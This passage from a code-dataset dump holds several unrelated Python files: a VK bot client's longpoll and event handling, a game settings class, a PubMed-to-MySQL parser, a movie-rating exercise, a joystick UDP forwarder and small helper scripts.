res\n\n async def get_user_longpoll(self):\n res = await self.vk_request('messages.getLongPollServer', group_id=self.group.id, lp_version=3)\n error = res.get('error', None)\n if error and error['error_code'] == 15:\n raise LoginError('User has no access to messages API. Try generating token with vk_botting.auth methods')\n elif error and error['error_code'] == 100:\n if self.force:\n await self.enable_longpoll()\n return await self.get_longpoll_server()\n raise VKApiError('Longpoll is disabled for this group. 
Enable longpoll or try force mode')\n elif error:\n raise VKApiError(f'[{error[\"error_code\"]}]{error[\"error_msg\"]}')\n self.key = res['response']['key']\n server = res['response']['server'].replace(r'\\/', '/')\n self.server = f'https://{server}'\n ts = res['response']['ts']\n return ts\n\n async def get_longpoll_server(self):\n res = await self.vk_request('groups.getLongPollServer', group_id=self.group.id)\n error = res.get('error', None)\n if error and error['error_code'] == 100:\n if self.force:\n await self.enable_longpoll()\n return await self.get_longpoll_server()\n raise VKApiError('Longpoll is disabled for this group. Enable longpoll or try force mode')\n elif error:\n raise VKApiError(f'[{error[\"error_code\"]}]{error[\"error_msg\"]}')\n self.key = res['response']['key']\n self.server = res['response']['server'].replace(r'\\/', '/')\n ts = res['response']['ts']\n return ts\n\n async def longpoll(self, ts):\n payload = {'key': self.key,\n 'act': 'a_check',\n 'ts': ts,\n 'wait': '10'}\n if not self.is_group:\n payload['mode'] = 10\n try:\n res = await self.general_request(self.server, **payload)\n except asyncio.TimeoutError:\n return ts, []\n if 'ts' not in res.keys() or 'failed' in res.keys():\n ts = await self.get_longpoll_server()\n else:\n ts = res['ts']\n updates = res.get('updates', [])\n return ts, updates\n\n async def handle_update(self, update):\n t = update['type']\n if t == 'message_new':\n obj = update['object'] if self.old_longpoll else update['object']['message']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_reply' and 'on_message_reply' in self.extra_events:\n obj = update['object']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_edit' and 'on_message_edit' in self.extra_events:\n obj = update['object']\n msg = await build_msg(obj, self)\n return self.dispatch(t, msg)\n elif t == 'message_typing_state' and 'on_message_typing_state' in self.extra_events:\n obj = update['object']\n state = await get_state(self.token, obj)\n return self.dispatch(t, state)\n elif t in ['message_allow', 'message_deny'] and any(event in self.extra_events for event in ['on_message_allow', 'on_message_deny']):\n obj = update['object']\n user = await get_pages(self.token, obj)\n return self.dispatch(t, user[0])\n elif t == 'photo_new' and 'on_photo_new' in self.extra_events:\n obj = update['object']\n photo = await get_photo(self.token, obj)\n return self.dispatch(t, photo)\n elif t in ['photo_comment_new', 'photo_comment_edit', 'photo_comment_restore'] and any(event in self.extra_events for event in ['on_photo_comment_new', 'on_photo_comment_edit', 'on_photo_comment_restore']):\n obj = update['object']\n comment = await get_photo_comment(self.token, obj)\n return self.dispatch(t, comment)\n elif t == 'photo_comment_delete' and 'on_photo_comment_delete' in self.extra_events:\n obj = update['object']\n deleted = await get_deleted_photo_comment(self.token, obj)\n return self.dispatch(t, deleted)\n elif t == 'audio_new' and 'on_audio_new' in self.extra_events:\n obj = update['object']\n audio = await get_audio(self.token, obj)\n return self.dispatch(t, audio)\n elif t == 'video_new' and 'on_video_new' in self.extra_events:\n obj = update['object']\n video = await get_video(self.token, obj)\n return self.dispatch(t, video)\n elif t in ['video_comment_new', 'video_comment_edit', 'video_comment_restore'] and any(event in self.extra_events for event in ['on_video_comment_new', 'on_video_comment_edit', 
'on_video_comment_restore']):\n            obj = update['object']\n            comment = await get_video_comment(self.token, obj)\n            return self.dispatch(t, comment)\n        elif t == 'video_comment_delete' and 'on_video_comment_delete' in self.extra_events:\n            obj = update['object']\n            deleted = await get_deleted_video_comment(self.token, obj)\n            return self.dispatch(t, deleted)\n        elif t in ['wall_post_new', 'wall_repost'] and any(event in self.extra_events for event in ['on_wall_post_new', 'on_wall_repost']):\n            obj = update['object']\n            post = await get_post(self.token, obj)\n            return self.dispatch(t, post)\n        elif t in ['wall_reply_new', 'wall_reply_edit', 'wall_reply_restore'] and any(event in self.extra_events for event in ['on_wall_reply_new', 'on_wall_reply_edit', 'on_wall_reply_restore']):\n            obj = update['object']\n            comment = await get_wall_comment(self.token, obj)\n            return self.dispatch(t, comment)\n        elif t == 'wall_reply_delete' and 'on_wall_reply_delete' in self.extra_events:\n            obj = update['object']\n            deleted = await get_deleted_wall_comment(self.token, obj)\n            return self.dispatch(t, deleted)\n        elif t in ['board_post_new', 'board_post_edit', 'board_post_restore'] and any(event in self.extra_events for event in ['on_board_post_new', 'on_board_post_edit', 'on_board_post_restore']):\n            obj = update['object']\n            comment = await get_board_comment(self.token, obj)\n            return self.dispatch(t, comment)\n        elif t == 'board_post_delete' and 'on_board_post_delete' in self.extra_events:\n            obj = update['object']\n            deleted = await get_deleted_board_comment(self.token, obj)\n            return self.dispatch(t, deleted)\n        elif t in ['market_comment_new', 'market_comment_edit', 'market_comment_restore'] and any(event in self.extra_events for event in ['on_market_comment_new', 'on_market_comment_edit', 'on_market_comment_restore']):\n            obj = update['object']\n            comment = await get_market_comment(self.token, obj)\n            return self.dispatch(t, comment)\n        elif t == 'market_comment_delete' and 'on_market_comment_delete' in self.extra_events:\n            obj = update['object']\n            deleted = await get_deleted_market_comment(self.token, obj)\n            return self.dispatch(t, deleted)\n        elif t == 'group_leave' and 'on_group_leave' in self.extra_events:\n            obj = update['object']\n            user = await get_pages(self.token, obj['user_id'])\n            return self.dispatch(t, (user[0], obj['self']))\n        elif t == 'group_join' and 'on_group_join' in self.extra_events:\n            obj = update['object']\n            user = await get_pages(self.token, obj['user_id'])\n            return self.dispatch(t, (user[0], obj['join_type']))\n        elif t == 'user_block' and 'on_user_block' in self.extra_events:\n            obj = update['object']\n            blocked = await get_blocked_user(self.token, obj)\n            return self.dispatch(t, blocked)\n        elif t == 'user_unblock' and 'on_user_unblock' in self.extra_events:\n            obj = update['object']\n            unblocked = await get_unblocked_user(self.token, obj)\n            return self.dispatch(t, unblocked)\n        elif t == 'poll_vote_new' and 'on_poll_vote_new' in self.extra_events:\n            obj = update['object']\n            vote = await get_poll_vote(self.token, obj)\n            return self.dispatch(t, vote)\n        elif t == 'group_officers_edit' and 'on_group_officers_edit' in self.extra_events:\n            obj = update['object']\n            edit = await get_officers_edit(self.token, obj)\n            return self.dispatch(t, edit)\n        elif 'on_unknown' in self.extra_events:\n            return self.dispatch('unknown', update)\n\n    async def handle_user_update(self, update):\n        t = update.pop(0)\n        if t == 4 and 'on_message_new' in self.extra_events:\n            data = {\n                'id': update.pop(0),\n                'flags': UserMessageFlags(update.pop(0)),\n            
'peer_id': update.pop(0),\n 'date': update.pop(0),\n 'text': update.pop(1),\n 'attachments': update.pop(1)\n }\n msg = await build_user_msg(data, self)\n return self.dispatch('message_new', msg)\n elif 'on_unknown' in self.extra_events:\n return self.dispatch('unknown', update)\n\n def dispatch(self, event, *args, **kwargs):\n method = 'on_' + event\n listeners = self._listeners.get(event)\n if listeners:\n removed = []\n for i, (future, condition) in enumerate(listeners):\n if future.cancelled():\n removed.append(i)\n continue\n\n try:\n result = condition(*args)\n except Exception as exc:\n future.set_exception(exc)\n removed.append(i)\n else:\n if result:\n if len(args) == 0:\n future.set_result(None)\n elif len(args) == 1:\n future.set_result(args[0])\n else:\n future.set_result(args)\n removed.append(i)\n\n if len(removed) == len(listeners):\n self._listeners.pop(event)\n else:\n for idx in reversed(removed):\n del listeners[idx]\n\n try:\n coro = getattr(self, method)\n except AttributeError:\n pass\n else:\n self._schedule_event(coro, method, *args, **kwargs)\n\n async def on_error(self, event_method, *args, **kwargs):\n print('Ignoring exception in {}'.format(event_method), file=sys.stderr)\n traceback.print_exc()\n\n async def _run_event(self, coro, event_name, *args, **kwargs):\n try:\n await coro(*args, **kwargs)\n except asyncio.CancelledError:\n pass\n except Exception:\n try:\n await self.on_error(event_name, *args, **kwargs)\n except asyncio.CancelledError:\n pass\n\n def _schedule_event(self, coro, event_name, *args, **kwargs):\n wrapped = self._run_event(coro, event_name, *args, **kwargs)\n return _ClientEventTask(original_coro=coro, event_name=event_name, coro=wrapped, loop=self.loop)\n\n async def get_user(self, uid):\n user = await get_users(self.token, uid)\n if user:\n return user[0]\n return None\n\n async def get_group(self, gid):\n group = await get_groups(self.token, gid)\n if group:\n return group[0]\n return None\n\n async def send_message(self, peer_id=None, message=None, *, attachment=None, sticker_id=None, keyboard=None, reply_to=None, forward_messages=None):\n params = {'group_id': self.group.id, 'random_id': randint(-2 ** 63, 2 ** 63 - 1), 'peer_id': peer_id, 'message': message, 'attachment': attachment,\n 'reply_to': reply_to, 'forward_messages': forward_messages, 'sticker_id': sticker_id, 'keyboard': keyboard}\n res = await vk_request('messages.send', self.token, **params)\n if 'error' in res.keys():\n raise VKApiError('[{error_code}] {error_msg}'.format(**res['error']))\n params['id'] = res['response']\n params['from_id'] = -self.group.id\n return await build_msg(params, self)\n\n async def _run(self, owner_id):\n if owner_id and owner_id.__class__ is not int:\n raise TypeError(f'Owner_id must be positive integer, not {owner_id.__class__.__name__}')\n if owner_id and owner_id < 0:\n raise VKApiError(f'Owner_id must be positive integer')\n user = await get_own_page(self.token)\n if user.__class__ is User:\n self.is_group = False\n self.group = Group({})\n self.user = user\n ts = await self.get_user_longpoll()\n self.dispatch('ready')\n updates = []\n while True:\n try:\n lp = self.loop.create_task(self.longpoll(ts))\n for update in updates:\n self.loop.create_task(self.handle_user_update(update))\n ts, updates = await lp\n except Exception as e:\n print(f'Ignoring exception in longpoll cycle:\\n{e}', file=sys.stderr)\n ts = await self.get_longpoll_server()\n else:\n self.is_group = True\n self.group = user\n self.user = User({})\n if self.is_group and 
owner_id:\n raise VKApiError('Owner_id passed together with group access_token')\n ts = await self.get_longpoll_server()\n self.dispatch('ready')\n updates = []\n while True:\n try:\n lp = self.loop.create_task(self.longpoll(ts))\n for update in updates:\n self.loop.create_task(self.handle_update(update))\n ts, updates = await lp\n except Exception as e:\n print(f'Ignoring exception in longpoll cycle:\\n{e}', file=sys.stderr)\n ts = await self.get_longpoll_server()\n\n def run(self, token, owner_id=None):\n self.token = token\n self.loop.create_task(self._run(owner_id))\n self.loop.run_forever()\n","sub_path":"vk_botting/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"104545996","text":"class Setting:\n \"\"\"游戏属性默认设置\"\"\"\n def __init__(self):\n self.screen_width = 1200\n self.screen_height = 800\n self.bg_color = (230, 230, 230)\n self.bg_blue = (187, 255, 255)\n self.ship_speed = 1.5\n self.ship_limit = 3\n\n # 子弹属性\n self.bullet_speed = 1.0\n self.bullet_width = 3\n self.bullet_height = 15\n self.bullet_color = (60, 60, 60)\n self.bullet_max_num = 10\n\n # 外星人\n self.alien_speed = 1.0\n self.fleet_drop_speed = 10\n self.alien_direction = 1\n\n self.rain_width = 60\n self.rain_height = 57\n\n self.alien_score = 10\n\n # 增加游戏难度\n self.speedup = 1.1\n self.score_up = 1.5\n\n def init_setting(self):\n self.ship_speed = 1.5\n self.alien_speed = 1.0\n self.fleet_drop_speed = 10\n self.alien_direction = 1\n self.alien_score = 10\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"198420166","text":"import os\r\nimport os.path\r\n\r\ndef is_float(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\ndef get_resolution(title):\r\n delimiters = ['[',']','(',')']\r\n width, height = '', ''\r\n res = []\r\n for char in delimiters:\r\n if char in title:\r\n title = title.replace(char, '')\r\n title = list(title)\r\n for i in range(len(title)):\r\n if (is_float(title[i]) and i >= len(title)*0.6):\r\n res.append(title[i])\r\n for element in res[:int(len(res) / 2)]:\r\n width += element\r\n for element in res[int(len(res) / 2):]:\r\n height += element\r\n if (len(width) == 0 or len(height) == 0):\r\n width, height = 0, 0\r\n return int(width), int(height)\r\n\r\ndef compatable(post):\r\n width,height = get_resolution(post.title)\r\n return (width >= 1920 and height >= 1080) and (width > height)\r\n\r\ndef cleanup_title(text):\r\n chars = ['/','\\\\',':','*','?','<','>','\"','|']\r\n for char in chars:\r\n if char in text:\r\n text = text.replace(char, '')\r\n return text\r\n \r\ndef cleanup_url(url):\r\n retStr = url\r\n url = url.split('.')\r\n if (url[len(url) - 1] != 'jpg'):\r\n retStr += '.jpg'\r\n return retStr\r\n\r\ndef size_filter(main_path):\r\n dels = 0\r\n for sub_path in os.listdir(main_path):\r\n file = os.path.join(main_path, sub_path)\r\n if (os.path.getsize(file) / 1000 < 300):\r\n os.remove(file)\r\n dels += 1\r\n return dels\r\n \r\n","sub_path":"Packages/old/auxv2.py","file_name":"auxv2.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"205897014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 14:34:14 2020\r\n\r\n@author: 
djx\r\n\"\"\"\r\n\r\n#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n\r\n\r\n# Import the pymysql library to store the data in MySQL\r\nimport pymysql \r\n# re could be used to escape the single quotes in author names; pymysql.escape_string() has the same effect\r\n#from re import escape\r\n# Connect to the pneumonia database\r\ndb=pymysql.connect(host='localhost',user='djx_pneumonia', password='123456',db = 'pneumonia')\r\n# cursor.close() -- should the cursor object be closed after use? Yes\r\n\r\n\r\n\r\nimport time\r\nimport os\r\nimport sys\r\n\r\nclass Logger(object):\r\n\r\n def __init__(self, stream=sys.stdout):\r\n project_path = r\"D:\\personfile\\study\\大三\\论文软著\\王菲菲老师\\疫情中各国学者在科技攻关和科技合作方面的贡献情况\\project\"\r\n demo_path = project_path + \"\\\\notebook的导出代码\"\r\n output_dir = demo_path + \"\\\\log\"\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n log_name = '{}.log'.format(time.strftime('%Y-%m-%d-%H-%M'))\r\n filename = os.path.join(output_dir, log_name)\r\n\r\n self.terminal = stream\r\n self.log = open(filename, 'a+',encoding='utf-8')\r\n\r\n def write(self, message):\r\n self.terminal.write(message)\r\n self.log.write(message)\r\n\r\n def flush(self):\r\n pass\r\n\r\n\r\n\r\n# No. 001\r\n# Purpose: look up the personal information of the given author\r\n# Parameter: the author's full name\r\n# Returns: the author's full record on success; on failure returns None and prints an error message\r\ndef select_writer(FAU):\r\n sql = \"select * from writer where FAU = '%s'\" % pymysql.escape_string(FAU)\r\n try:\r\n db.ping(reconnect=True) # Run conn.ping(reconnect=True) before every SQL statement so a lost connection reconnects automatically, avoiding the (0,'') error\r\n cursor=db.cursor()\r\n \r\n if cursor.execute(sql)>0:\r\n # Fetch the matching record\r\n writer = cursor.fetchone()\r\n cursor.close()\r\n return writer\r\n else:\r\n cursor.close()\r\n \r\n \r\n except Exception as e:\r\n print (\"Error: unable to fetch writer's data \" + str(e))\r\n print(sql)\r\n cursor.close()\r\n return None\r\n \r\n\r\n# No. 002\r\n# Purpose: insert one author's personal information\r\n# Parameters: full name, short name, affiliation, country\r\n# Returns: the author's AUID on success; on failure returns nothing and prints an error message\r\ndef insert_writer(AUID,FAU,AU,AD,Country):\r\n \r\n writer = select_writer(FAU) # Check whether the author is already in the table; if so, return the whole row\r\n# print(dir(writer))\r\n if(writer is not None):\r\n return writer[0]\r\n AD = AD.replace(\"\\n\",\"\") # Must come before the escaping calls, because the newline itself would otherwise be escaped\r\n AD = pymysql.escape_string(AD) # Escape unescaped single/double quotes so the database insert does not fail\r\n AU = pymysql.escape_string(AU)\r\n FAU = pymysql.escape_string(FAU)\r\n Country = pymysql.escape_string(Country)\r\n sql = \"insert into writer(AUID,FAU,AU,AD,Country) values('%s','%s','%s','%s','%s')\" % (AUID,FAU,AU,AD,Country)\r\n try:\r\n db.ping(reconnect=True)\r\n cursor=db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n cursor.close()\r\n return AUID\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert writer's data \" + FAU + \" \" + AU + \" \" + AD + \" \" + Country + str(e))\r\n\r\n\r\n
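\r\n# A minimal usage sketch of the two helpers above (hypothetical author values, not taken from the corpus):\r\n# auid = insert_writer(1000, \"O'Brien, John\", 'Brien J', 'Some University, Boston, MA.', 'USA')\r\n# row = select_writer(\"O'Brien, John\") # full row on success, None otherwise\r\n\r\n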
# No. 003.1\r\n# Purpose: look up an article\r\n# Returns: PMID\r\ndef select_article(PMID):\r\n \r\n sql = \"select * from article where PMID = '%s'\" % PMID\r\n try:\r\n db.ping(reconnect = True)\r\n cursor = db.cursor()\r\n a = cursor.execute(sql) \r\n if a > 0:\r\n article = cursor.fetchone()\r\n print(article)\r\n cursor.close()\r\n return article\r\n else:\r\n cursor.close()\r\n return None\r\n except Exception as e:\r\n print(str(e) + \" error in function 003.1 (select_article)\")\r\n return None\r\n\r\n# No. 003\r\n# Purpose: insert one article's bibliographic information into the article table\r\n# Parameters: PMID,DEP,LA,TA\r\n# Returns: PMID; on failure prints an error message\r\ndef insert_article(PMID,DEP,LA,TA,topic):\r\n PMID = PMID.strip()\r\n DEP = pymysql.escape_string(DEP)\r\n LA = pymysql.escape_string(LA)\r\n TA = pymysql.escape_string(TA)\r\n\r\n# The same article may appear under two topics at once\r\n# When has_save is non-empty, the article has already been inserted\r\n has_save = select_article(PMID)\r\n sql_1 = \"insert into article(PMID,DEP,LA,TA)values('%s','%s','%s','%s')\" % (PMID,DEP,LA,TA)\r\n sql_2 = \"insert into topic(PMID,topic)values('%s','%s')\"%(PMID,topic)\r\n try:\r\n db.ping(reconnect=True)\r\n cursor = db.cursor()\r\n print(PMID,DEP,LA,TA,topic)\r\n if has_save is None:\r\n print(\"article not inserted yet\")\r\n cursor.execute(sql_1)\r\n cursor.execute(sql_2)\r\n db.commit()\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert article's information, it may already be inserted \" + str(PMID) + \" because \" + str(e))\r\n\r\n\r\n\r\n\r\n# No. 004\r\n# Purpose: check whether the author/article relation has already been recorded\r\n# Parameters: AUID,PMID\r\n# Returns: the RecordID if already inserted, otherwise None\r\ndef select_Relationship(AUID,PMID):\r\n sql = \"select * from relationship where AUID = '%s' and PMID = '%s'\"%(AUID,PMID)\r\n try:\r\n db.ping(reconnect = True)\r\n cursor = db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n result = cursor.fetchone()\r\n cursor.close()\r\n return result\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: failed to query relationship \" + \"AUID:\" + AUID + \"PMID:\" + PMID + str(e))\r\n\r\n\r\n# No. 005\r\n# Purpose: link the author AUID with the article PMID and store the pair in the RelationShip table\r\n# Parameters: AUID,PMID\r\n# Returns: if the pair was already inserted, returns the existing record;\r\n# otherwise returns RecordID on success, and prints an error message on failure\r\ndef insert_article_and_author(AUID,PMID):\r\n sql = \"insert into relationship(AUID,PMID)values('%s','%s')\" % (AUID,PMID)\r\n try:\r\n result = select_Relationship(AUID,PMID)\r\n if result:\r\n print('record already exists '+ str(result))\r\n return result\r\n db.ping(reconnect=True)\r\n cursor=db.cursor()\r\n cursor.execute(sql)\r\n db.commit()\r\n cursor.close()\r\n return True\r\n except Exception as e:\r\n db.rollback()\r\n cursor.close()\r\n print(\"Error: unable to insert relationship\" + \"AUID:\" + str(AUID) + \"PMID:\" + str(PMID) + str(e),end='-------------\\n\\n')\r\n\r\n\r\n
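# A minimal illustration of the input layout the parser below assumes -- PubMed MEDLINE text,\r\n# where the tag occupies the first four characters and the value starts at offset 6\r\n# (these sample lines are hypothetical, not from the corpus):\r\n# PMID- 32345678\r\n# FAU - Smith, John\r\n# AU - Smith J\r\n# AD - Some University, Some City.\r\n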
def main():\r\n sys.stdout = Logger(sys.stdout) # record the output to the log\r\n project_path = r\"D:\\personfile\\study\\大三\\论文软著\\王菲菲老师\\疫情中各国学者在科技攻关和科技合作方面的贡献情况\\project\"\r\n result_folder_path = project_path + r\"\\result\\7.11\"\r\n# result_filepath = result_folder_path + r\"\\Forecasting.txt\"\r\n AUID = 1000\r\n for filename in os.listdir(result_folder_path):\r\n result_filepath = result_folder_path + \"\\\\\" + filename\r\n print(result_filepath)\r\n with open(result_filepath,'r',encoding = 'utf-8') as result_file:\r\n topic = filename[:-4]\r\n DEP = ''\r\n LA = ''\r\n TA = ''\r\n ADline = []\r\n PMID = ''\r\n for i in result_file.readlines():\r\n # Observation: however many characters the tag has, the field before the dash is always four characters wide (spaces included)\r\n if(i[:4] == 'PMID'): # extract the PMID field\r\n flag = 'PMID'\r\n insert_article(PMID,DEP,LA,TA,topic)\r\n PMID = i[6:] \r\n continue\r\n if(i[:4] == 'DEP '): # extract DEP (publication date)\r\n DEP = i[6:].strip()\r\n continue\r\n if(i[:4] == 'LA '): # extract LA (language)\r\n flag = 'LA'\r\n LA = i[6:].strip()\r\n continue\r\n if(i[:4] == 'TA '): # extract TA (journal title)\r\n TA = i[6:].strip()\r\n continue\r\n if(i[:4] == 'FAU '): # extract FAU (author full name)\r\n flag = 'FAU'\r\n if('FAU' in locals().keys()):\r\n # If the key does not exist yet, the first author has not been read in, so do not insert;\r\n # if it already exists, the previous FAU, AU and AD are complete, so insert them and move on to the next author\r\n if('AD' not in locals().keys()):\r\n AD = ''\r\n temp = AUID\r\n AUID = insert_writer(AUID,FAU,AU,AD,'Country')\r\n ADline = [] \r\n # Clear all attributes of the previous author before inserting a new one, then refill them\r\n insert_article_and_author(AUID,PMID)\r\n if AUID == temp:\r\n AUID = temp + 1\r\n else:\r\n AUID = temp\r\n FAU = i[6:].strip(\"\\n '\" ) # strip newlines, whitespace and escaped single quotes before storing to the database\r\n continue\r\n if(i[:4] == 'AU '): # extract AU (author short name)\r\n AU = i[6:].strip(\"\\n '\")\r\n continue\r\n if(i[:4] == 'AD 'or (i[:1]==' 'and flag == 'AD')): # extract AD (author affiliation)\r\n flag = 'AD' \r\n ADline.append(i[6:])\r\n AD = \"\".join(ADline)\r\n continue\r\n db.close()\r\nmain()\r\n\r\n\r\n# #### An example of escaping special characters when inserting strings into the database\r\n\r\n# print(\"University of Toronto, St. Michael\\\\\\'s Hospital, and BlueDot, Toronto, Ontario, Canada (K.K.).\")\r\n# \r\n# output:University of Toronto, St. Michael\\'s Hospital, and BlueDot, Toronto, Ontario, Canada (K.K.).\r\n\r\n\r\n\r\n","sub_path":"step1:提取_存储.py","file_name":"step1:提取_存储.py","file_ext":"py","file_size_in_byte":10134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"289335628","text":"#%%\nmovie_object_list = [{'Title': 'Back to the Future',\n 'Year': '1985',\n 'Rated': 'PG',\n 'Released': '03 Jul 1985',\n 'Runtime': '116 min',\n 'Genre': 'Adventure, Comedy, Sci-Fi',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '8.5'},\n {'Source': 'Rotten Tomatoes', 'Value': '96'},\n {'Source': 'Metacritic', 'Value': '87'}],\n 'Production': 'Universal Pictures'},\n {'Title': 'Spirited Away',\n 'Year': '2001',\n 'Rated': 'PG',\n 'Released': '28 Mar 2003',\n 'Runtime': '125 min',\n 'Genre': 'Animation, Adventure, Family, Fantasy, Mystery',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '8.6'},\n {'Source': 'Rotten Tomatoes', 'Value': '77'},\n {'Source': 'Metacritic', 'Value': '96'}],\n 'Production': 'Walt Disney Pictures'},\n {'Title': 'Blade',\n 'Year': '1998',\n 'Rated': 'R',\n 'Released': '21 Aug 1998',\n 'Runtime': '120 min',\n 'Genre': 'Action, Horror, Sci-Fi',\n 'Ratings': [{'Source': 'Internet Movie Database', 'Value': '7.1'},\n {'Source': 'Rotten Tomatoes', 'Value': '54'},\n {'Source': 'Metacritic', 'Value': '45'}],\n 'Production': 'New Line Cinema'}]\n\n\nclass Movie:\n\n \"\"\"\n The Movie class holds all the data for a single movie, has getter methods to get title and movie rating\n \"\"\"\n\n def __init__(self, movie_data):\n \"\"\"\n Store the raw movie data\n\n Parameters: \n * movie_data: dict, full dictionary of movie data\n \"\"\"\n self.movie_data = movie_data\n\n def get_movie_title(self):\n \"\"\"\n Return movie title from the raw data.\n \"\"\"\n return self.movie_data['Title']\n\n def get_movie_rating(self, source = 'Rotten Tomatoes'):\n \"\"\"\n Return movie rating for a given source.\n \n Parameters:\n source: str, source of desired movie rating. Defaults to Rotten Tomatoes\n \"\"\"\n for rating in self.movie_data['Ratings']:\n if rating['Source'] == source:\n return(rating['Value'])\n\n return(f\"- Wait - Rating for source {source} was not found!\")\n\n\ndef return_single_movie_object(movie_title):\n \"\"\"\n Search through list of movie object dictionaries and return the object \n if the Title of that object matches the movie title passed.\n\n Parameters:\n * movie_title: str, title of movie whose dict object is to be returned.\n \"\"\"\n for movie_object in movie_object_list:\n if movie_object['Title'] == movie_title:\n return movie_object\n\n\ndef print_single_movie_rating(movie_query):\n \"\"\"\n Print a movie rating for a given movie.\n\n Parameters:\n * movie_query: str, title of movie to get rating for.\n \"\"\"\n this_movie_data = return_single_movie_object(movie_query)\n this_movie_instance = Movie(this_movie_data)\n movie_title = this_movie_instance.get_movie_title()\n movie_rating = this_movie_instance.get_movie_rating()\n print(f\"The rating for {movie_title} is {movie_rating}.\")\n\n\n
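# A quick usage sketch, using values from movie_object_list above:\n# blade = Movie(return_single_movie_object('Blade'))\n# blade.get_movie_title() # -> 'Blade'\n# blade.get_movie_rating() # -> '54' (Rotten Tomatoes is the default source)\n# blade.get_movie_rating('Metacritic') # -> '45'\n\n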
def print_all_ratings(movie_list):\n \"\"\"\n Print a judgement of each movie in a movie list. If the score is over 80,\n print that it's a great movie; if the score is over 60, print that it's a\n good movie; if the score is under 60 print that it's a bad movie.\n \n Parameters:\n * movie_list: list, List of movie titles to print ratings for.\n \"\"\"\n for movie in movie_list:\n this_movie_data = return_single_movie_object(movie)\n this_movie_instance = Movie(this_movie_data)\n movie_title = this_movie_instance.get_movie_title()\n movie_rating = float(this_movie_instance.get_movie_rating())\n if movie_rating >= 80:\n print(movie_title, 'is a great movie!')\n elif movie_rating >= 60:\n print(movie_title, 'is a good movie')\n elif movie_rating < 60:\n print(movie_title, 'is a bad movie')\n\n\ndef main():\n \"\"\"\n Run from here\n \"\"\"\n print_all_ratings(['Blade', 'Spirited Away', 'Back to the Future'])\n print_single_movie_rating('Spirited Away')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ga-python/mywork/w4d2/Lab-4-Solution.py","file_name":"Lab-4-Solution.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"369857914","text":"#!/usr/bin/python3\nimport struct\nimport time\nfrom socket import socket, AF_INET, SOCK_DGRAM\n\nhost = ''\nport = 5000\naddress = \"192.168.3.2\"\nsock = socket(AF_INET, SOCK_DGRAM)\ndevice_path = \"/dev/input/js0\"\n\nevent_format = \"LhBB\";\nevent_size = struct.calcsize(event_format)\n\nwhile True:\n try:\n with open(device_path, \"rb\") as device:\n print(\"input connect...\")\n while True:\n event = device.read(event_size)\n if event:\n sock.sendto(event, (address, port))\n except:\n print(\"dead...\")\n import traceback\n traceback.print_exc()\n time.sleep(5)\nsock.close()\n\n\n","sub_path":"scripts/clientJoy.py","file_name":"clientJoy.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"347244261","text":"class second:\n color = 'red'\n form = 'circle'\n square = 'big'\n def changecolor(self, newcolor):\n self.color = newcolor\n def changeform(self, newform):\n self.form = newform\n def changesquare(self, newsquare):\n self.square = newsquare\n\nobj1 = second()\nobj2 = second()\n\nprint(obj1.color, obj1.form, obj1.square)\nprint(obj2.color, obj2.form, obj2.square)\n\nobj1.changecolor(input('Enter the color of object 1 - '))\nobj1.changeform(input('Enter the shape of object 1 - '))\nobj1.changesquare(input('Enter the size of object 1 - '))\nobj2.changecolor(input('Enter the color of object 2 - '))\nobj2.changeform(input('Enter the shape of object 2 - '))\nobj2.changesquare(input('Enter the size of object 2 - '))\n\nprint(obj1.color, obj1.form, obj1.square)\nprint(obj2.color, obj2.form, obj2.square)\n","sub_path":"class obj.py","file_name":"class obj.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"599690462","text":"from nms import py_cpu_nms,py_cpu_softnms,set_cpu_nms\nfrom d2det.ops.nms.nms_wrapper import soft_nms\nimport numpy as np\nfrom tqdm import tqdm \nfrom collections import defaultdict\nimport random\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom ensemble_boxes import nms\nimport json\nimport os\ntry:\n import xml.etree.cElementTree as ET # the C implementation of the xml parsing module\nexcept ImportError:\n import xml.etree.ElementTree as ET\n
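\n# fliter() below drops boxes whose aspect ratio or area falls outside mean +/- k*std.\n# A toy illustration with made-up numbers (not from this dataset):\n# vals = [1.0, 1.1, 0.9, 5.0] -> np.mean = 2.0, np.std ~= 1.73\n# with k = 1 the accepted window is [0.27, 3.73], so 5.0 would be dropped.\n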
